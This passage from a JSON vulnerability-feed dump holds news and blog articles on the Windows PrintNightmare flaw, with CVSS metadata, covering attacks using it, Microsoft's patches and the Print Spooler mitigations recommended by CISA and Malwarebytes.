adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its software.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": "https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:27", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account was un-enrolled from Duo due to a long period of inactivity, but had not yet been disabled in the NGO's Active Directory, thereby allowing the attackers to escalate their privileges using the PrintNightmare flaw and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-07-14T12:38:34", "description": "Last week we wrote about [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>), a vulnerability that was supposed to be patched but wasn't. After June's Patch Tuesday, researchers found that the patch did not work in every case, most notably on modern domain controllers. Yesterday, Microsoft issued a set of out-of-band patches that sets that aims to set that right by fixing the Windows Print Spooler Remote Code Execution vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n### Serious problem\n\nFor Microsoft to publish an out-of-band patch a week before July's Patch Tuesday shows just how serious the problem is.\n\nPrintNightmare allows a standard user on a Windows network to execute arbitrary code on an affected machine, and to elevate their privileges as far as domain admin, by feeding a vulnerable machine a malicious printer driver. The problem was exacerbated by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the event it turned out to be a bit of both.\n\nLast week the Cybersecurity and Infrastructure Security Agency (CISA) urged administrators to [disable the Windows Print Spooler service](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) in domain controllers and systems that don't print.\n\nHowever, the installation of the Domain Controller (DC) role adds a thread to the spooler service that is responsible for removing stale print queue objects. If the spooler service is not running on at least one domain controller in each site, then Active Directory has no means to remove old queues that no longer exist.\n\nSo, many organizations were forced to keep the Print Spooler service enabled on some domain controllers, leaving them at risk to attacks using this vulnerability.\n\n### Set of patches\n\nDepending on the Windows version the patch will be offered as:\n\n * [KB5004945](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 2004, version 20H1, and version 21H1\n * [KB5004946](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004946-os-build-18363-1646-out-of-band-18c5ffac-6015-4b3a-ba53-a73c3d3ed505>) for Windows 10 version 1909\n * [KB5004947](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 1809 and Windows Server 2019\n * KB5004949 for Windows 10 version 1803 which is not available yet\n * [KB5004950](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004950-os-build-10240-18969-out-of-band-7f900b36-b3cb-4f5e-8eca-107cc0d91c50>) for Windows 10 version 1507\n * Older Windows versions (Windows 7 SP1, Windows 8.1 Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows Server 2012 R2) will receive a security update that disallows users who are not administrators to install only signed print drivers to a print server.\n\nSecurity updates have not yet been released for Windows 10 version 1607, Windows Server 2016, or Windows Server 2012, but they will also be released soon, according to Microsoft.\n\nThe updates are cumulative and contain all previous fixes as well as protections for [CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>).\n\n### Not a complete fix\n\nIt is important to note that these patches and updates **only tackle the remote code execution (RCE) part** of the vulnerability. Several researchers have confirmed that the local privilege escalation (LPE) vector still works. This means that threat actors and already active malware can still locally exploit the vulnerability to gain SYSTEM privileges.\n\n### Advice\n\nMicrosoft recommends that you install this update immediately on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the `RestrictDriverInstallationToAdministrators` registry setting to prevent non-administrators from installing signed printer drivers on a print server. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n> \u201cThe attack vector and protections in CVE-2021-34527 reside in the code path that installs a printer driver to a Server. The workflow used to install a printer driver from a trusted print server on a client computer uses a different path. In summary, protections in CVE-2021-34527 including the RestrictDriverInstallationToAdministrators registry key do not impact this scenario.\u201d\n\nCISA encourages users and administrators to review the Microsoft Security Updates as well as CERT/CC Vulnerability Note [VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\n### Impact of the updates\n\nSo, the vulnerability lies in the normal procedure that allows users to install a printer driver on a server. A printer driver is in essence an executable like any other. And allowing users to install an executable of their choice is asking for problems. Especially combined with a privilege escalation vulnerability that anyone can use to act with SYSTEM privileges. The updates, patches, and some of the workarounds are all designed to limit the possible executables since they need to be signed printer drivers.\n\nFor a detailed and insightful diagram that shows GPO settings and registry keys administrators can check whether their systems are vulnerable, have a look at this flow chart diagram, courtesy of [Will Dormann](<https://twitter.com/wdormann>).\n\n> This is my current understanding of the [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) exploitability flowchart. \nThere's a small disagreement between me and MSRC at the moment about UpdatePromptSettings vs. NoWarningNoElevationOnUpdate, but I think it doesn't matter much as I just have both for now. [pic.twitter.com/huIghjwTFq](<https://t.co/huIghjwTFq>)\n> \n> -- Will Dormann (@wdormann) [July 7, 2021](<https://twitter.com/wdormann/status/1412906574998392840?ref_src=twsrc%5Etfw>)\n\n### Information for users that applied 0patch\n\nIt is worth mentioning for the users that applied the PrintNightmare [micropatches by 0patch](<https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html>) that according to 0patch it is better not to install the Microsoft patches. They posted on Twitter that the Microsoft patches that only fix the RCE part of the vulnerability disable the 0patch micropatch which fixes both the LPE and RCE parts of the vulnerability.\n\n> If you're using 0patch against PrintNightmare, DO NOT apply the July 6 Windows Update! Not only does it not fix the local attack vector but it also doesn't fix the remote vector. However, it changes localspl.dll, which makes our patches that DO fix the problem stop applying. <https://t.co/osoaxDVCoB>\n> \n> -- 0patch (@0patch) [July 7, 2021](<https://twitter.com/0patch/status/1412826130051174402?ref_src=twsrc%5Etfw>)\n\n### Update July 9, 2021\n\nOnly a little more than 12 hours after the release a researcher has found an exploit that works on a patched system under special circumstances. [Benjamin Delpy](<https://twitter.com/gentilkiwi?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1412771368534528001%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Fgadgets%2F2021%2F07%2Fmicrosofts-emergency-patch-fails-to-fix-critical-printnightmare-vulnerability%2F>) showed an exploit working against a Windows Server 2019 that had installed the out-of-band patch. In a demo Delpy shows that the update fails to fix vulnerable systems that use certain settings for a feature called [point and print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>), which makes it easier for network users to obtain the printer drivers they need.\n\nIn Microsoft's defense the advisory for [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) contains a note in the FAQ stating that:\n\n> Point and Print is not directly related to this vulnerability, but certain configurations make systems vulnerable to exploitation.\n\n### Update July 14, 2021\n\nThe Cybersecurity and Infrastructure Security Agency\u2019s (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability. \n\nCISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. The actions CISA lists are required actions for the agencies. The determination that these actions are necessary is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems. Exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nThe post [UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:17:31", "type": "malwarebytes", "title": "UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T14:17:31", "id": "MALWAREBYTES:DB34937B6474073D9444648D34438225", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T08:32:20", "description": "In a rush to be the first to publish a proof-of-concept (PoC), researchers have published a write-up and a demo exploit to demonstrate a vulnerability that has been dubbed PrintNightmare. Only to find out they had alerted the world to a new 0-day vulnerability by accident.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nAs per [usual](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>), the general advice was to install the patches from Microsoft and you\u2019re done. Fast forward another week and a researcher announced he'd found a way to exploit the vulnerability to achieve both local privilege escalation and remote code execution. This actually happens a lot when researchers reverse engineer a patch.\n\nOnly in this case it had an unexpected consequence. A different team of researchers had also found an RCE vulnerability in the Print Spooler service. They called theirs PrintNightmare and believed it was the same as CVE-2021-1675. They were working on a presentation to be held at the Black Hat security conference. But now they feared that the other team had stumbled over the same vulnerability, so they published their work, believing it was covered by the patch already released by Microsoft.\n\nBut the patch for CVE-2021-1675 didn't seem to work against the PrintNightmare vulnerability. It appeared that PrintNightmare and CVE-2021-1675 were in fact two very similar but different vulnerabilities in the Print Spooler.\n\nAnd with that, it looked as if the PrintNightmare team had, unwittingly, disclosed a new 0-day vulnerability irresponsibly. (Disclosure of vulnerabilities is considered responsible if a vendor is given enough time to issue a patch.)\n\nSince then, some security researchers have argued that CVE-2021-1675 and PrintNightmare are the same, and others have reported that the CVE-2021-1675 patch works on _some_ systems.\n\n> [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) / CVE-2021-1675 - It appears patches might be effective on systems that are not domain controllers. RpcAddPrinterDriverEx call as non-admin fails with access denied against fully patched Server 2016 and 2019 non-DC, but after dcpromo the exploit works again. \n [pic.twitter.com/USetUXUzXN](<https://t.co/USetUXUzXN>)\n> \n> -- Stan Hegt (@StanHacked) [July 1, 2021](<https://twitter.com/StanHacked/status/1410405688766042115?ref_src=twsrc%5Etfw>)\n\nWhether they are the same or not, what is not in doubt is that there are live Windows systems where PrintNightmare cannot be patched. And unfortunately, it seems that the systems where the patch doesn't work are Windows Domain Controllers, which is very much the worst case scenario. \n\n### PrintNightmare\n\nThe Print Spooler service is embedded in the Windows operating system and manages the printing process. It is running by default on most Windows machines, including Active Directory servers.\n\nIt handles preliminary functions of finding and loading the print driver, creating print jobs, and then ultimately printing. This service has been around \u201cforever\u201d and it has been a fruitful hunting ground for vulnerabilities, with many flaws being found and fixed over the years. Remember [Stuxnet](<https://blog.malwarebytes.com/threat-analysis/2013/11/stuxnet-new-light-through-old-windows/>)? Stuxnet also exploited a vulnerability in the Print Spooler service as part of the set of vulnerabilities the worm used to spread.\n\nPrintNightmare can be triggered by an unprivileged user attempting to load a malicious driver remotely. Using the vulnerability, researchers have been able to gain SYSTEM privileges, and achieved remote code execution with the highest privileges on a fully patched system.\n\nTo exploit the flaw, attackers would first have to gain access to a network with a vulnerable machine. Although this provides some measure of protection, it is worth noting that there are underground markets where criminals can purchase this kind of access for a few dollars.\n\nIf they can secure any kind of access, they can potentially use PrintNightmare to turn a normal user into an all-powerful Domain Admin. As a Domain Admin they could then act almost with impunity, spreading ransomware, deleting backups and even disabling security software.\n\n### Mitigation\n\nConsidering the large number of machines that may be vulnerable to PrintNightmare, and that several methods to exploit the vulnerability have been published, it seems likely there will soon be malicious use-cases for this vulnerability.\n\nThere are a few things you can do until the vulnerability is patched. Microsoft will probably try to patch the vulnerability before next patch Tuesday (July 12), but until then you can:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the internet.\n\nI realize the above will not be easy or even feasible in every case. For those machines that need the Print Spooler service and also need to be accessible from outside the LAN, very carefully limit and [monitor](<https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula>) access events and permissions. Also at all costs avoid running the Print Spooler service on any domain controllers.\n\nFor further measures it is good to know that the exploit works by dropping a DLL in a subdirectory under C:\\Windows\\System32\\spool\\drivers, so system administrators can create a \u201cDeny to modify\u201d rule for that directory and its subdirectories so that even the SYSTEM account can not place a new DLL in them.\n\nThis remains a developing situation and we will update this article if more information becomes available.\n\n### Update July 2, 2021\n\nMicrosoft acknowledged this vulnerability and it has been assigned [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). In their description Microsoft also provides an extra workaround besides disabling the Print Spooler service.\n\n**Disable inbound remote printing through Group Policy**\n\nYou can also configure the settings via Group Policy as follows:\n\n * Computer Configuration / Administrative Templates / Printers\n * Disable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nThe post [PrintNightmare 0-day can be used to take over Windows domain controllers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T14:08:26", "type": "malwarebytes", "title": "PrintNightmare 0-day can be used to take over Windows domain controllers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T14:08:26", "id": "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T12:35:46", "description": "I doubt if there has ever been a more appropriate nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nIn a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. This vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) was introduced under the name PrintNightmare.\n\nOminously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.\n\nAt the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, [Benjamin Delpy](<https://twitter.com/gentilkiwi>) showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.\n\nOn July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it became aware of multiple threat actors exploiting PrintNightmare.\n\nAlso in July, [CrowdStrike](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.\n\n### An end to the nightmare?\n\nIn the August 10 [Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) update, the Print Spooler service was subject to _yet more_ patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.\n\nIn an unusual breaking change, one part of the update made admin rights required before using the Windows Point and Print feature.\n\n### Just one day later\n\nOn August 11, Microsoft released information about [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>), yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who [demonstrated](<https://vimeo.com/581584478>) the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.\n\n### Mitigation\n\nThe workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.\n\nMicrosoft says it is investigating the vulnerability and working on (yet another) security update.\n\nLike I said [yesterday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>): To be continued.\n\nThe post [Microsoft's PrintNightmare continues, shrugs off Patch Tuesday fixes](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T11:30:26", "type": "malwarebytes", "title": "Microsoft\u2019s PrintNightmare continues, shrugs off Patch Tuesday fixes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T11:30:26", "id": "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-31T08:36:55", "description": "Users with low privileges can access 